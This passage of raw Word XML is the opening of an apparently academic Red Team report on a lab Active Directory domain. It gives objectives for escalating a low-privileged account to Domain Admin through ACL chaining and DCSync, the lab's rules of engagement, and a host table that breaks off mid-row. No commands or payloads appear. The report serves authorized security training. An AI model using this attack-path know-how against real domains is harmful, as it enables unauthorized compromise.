        <w:t>In recent years, security research by threat groups and Red Teams has demonstrated that internal privilege escalation is rarely achieved through a single catastrophic vulnerability. Instead, threat actors execute multi-stage attack paths (or 'attack chains') where small, seemingly low-risk configuration flaws are concatenated. For instance, a low-privileged user account with a misconfigured Access Control List (ACL) right over another user can trigger a cascading series of credential harvesting, lateral movement, and local service exploitation steps that ultimately culminate in domain-wide administrative compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF97ED" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.2 Scope &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C34556A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This project was executed to simulate a real-world Red Team penetration test against an enterprise Active Directory domain named INLANEFREIGHT.LOCAL. The primary objective of this exercise was to evaluate the resilience of the AD domain against an insider threat or an attacker who has achieved an initial low-privileged foothold inside the corporate internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD6FCA" w14:textId="4E3A3438" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key Engagement Objectives:</w:t>
      </w:r>
      <w:r w:rsidR="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specific assessment objectives included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54767FA2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation Paths: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Determine whether a single low-privileged domain account (hporter) can be escalated to full Domain Administrator privileges through misconfiguration chaining.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610B4F3A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration Auditing: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identify and document structural ACL oversights, excessive privilege delegations, weak service account configurations, and insecure credential storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EB5B0F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DCSync Impact Verification: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Demonstrate the realistic business impact of unmonitored directory replication rights (GetChanges / GetChangesAll).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25111303" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Defensive Hardening: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Formulate actionable, prioritized remediation strategies aligned with industry standards (CIS Benchmarks &amp; MITRE ATT&amp;CK) to harden the environment against future attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B131549" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.3 Rules of Engagement &amp; Target Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46245807" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The engagement was conducted strictly within an isolated, instructor-approved laboratory environment in accordance with academic integrity guidelines and formal Rules of Engagement (RoE). Testing was confined to designated subnets and virtualized assets. No denial-of-service (DoS) exploits, destructive payload executions, or testing against non-consenting external targets occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51DB75" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Environment Architecture: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A61A4C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The primary target assets comprising the INLANEFREIGHT.LOCAL lab environment are detailed in Table 1 below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2304"/>
        <w:gridCol w:w="2304"/>
        <w:gridCol w:w="2304"/>
        <w:gridCol w:w="2304"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00A61A4C" w14:paraId="2BCAEC96" w14:textId="77777777" w:rsidTr="00EF73F6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E5D0C52" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Host Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22AE6029" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16ABCB7B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OS / Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57A9E534" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Starting Privilege Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00A61A4C" w14:paraId="5F0BBD76" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="22E2F12A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DC01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="774A9459" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>172.16.8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="032A0E1A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Server 2019 DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F6BA0FB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Domain Controller (Target Goal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00A61A4C" w14:paraId="18825E38" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60704795" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MS01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E7718A9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>172.16.8.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="49F9FD0F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Server 2019 Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="166E1759" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>WinRM / Application Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00A61A4C" w14:paraId="00A64CE1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C653640" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DEV01 / DMZ01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31DF2006" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>172.16.8.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="57DC59CC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ubuntu Linux / Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B6DDC39" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Initial Foothold Pivot Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00A61A4C" w14:paraId="294A765A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06E002DF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Attacker Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5ADAE227" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>172.16.8.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1A22DFE7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00A61A4C" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61A4C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kali Linux 2026.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2304" w:type="dxa"/>
